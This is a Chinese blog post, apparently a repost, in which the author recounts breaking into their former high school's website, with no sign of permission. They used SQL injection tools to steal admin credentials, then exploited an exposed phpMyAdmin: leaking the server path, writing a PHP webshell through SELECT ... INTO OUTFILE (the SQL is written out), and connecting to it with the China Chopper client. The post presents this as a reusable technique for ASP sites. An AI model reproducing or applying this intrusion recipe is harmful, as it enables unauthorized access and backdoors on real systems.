Phpmyadmin搞定asp网站。
自己的高中母校,以前就用啊D扫出过用户名密码后台。
没有亮点,只能说一定要多方面考虑问题。
说下过程吧
用啊D,找到注入点,啊D和Havij来搞到用户名和密码。
超级管理员没搞破出来密码,只有一个普通管理员的。
Wscan扫出后台
登录后台
上传图片的地方试了很多次了,没上传成功,也用nc传过,能想到的方法都试了。
网站相关信息
百度了一下,很老的东西了,有注入 漏洞 ,但对我没啥用了。
然后就一直卡在这里了,好久好久,,,问了一个朋友,让他试了下。
他扫目录扫到了phpmyadmin,其实我也扫出来过,但可能是没关注,还是太年轻了。他说
用这个可以搞定。
打开
自己去网上找到一些命令 http://www.2cto.com /phpmyadmin/libraries/select_lang.lib.php
先爆出物理路径:
创建表------表中插入一句话-------一句话写入文件-----删除表。
CreateTABLEa(cmdtextNOTNULL);
InsertINTOa(cmd)VALUES('');
selectcmdfromaintooutfile'C:/php/AppServ/www/phpMyAdmin/d.php';
DropTABLEIFEXISTSa;
连接菜刀(第一次用菜刀能连上,激动啊)
文章无亮点,只是利用了一个已经不用的phpmyadmin来传的php马。Asp网站也可以这样
搞。
查看更多关于通过phpmyadmin入侵asp网站 - 网站安全 - 自学php的详细内容...
声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://www.haodehen.cn/did14606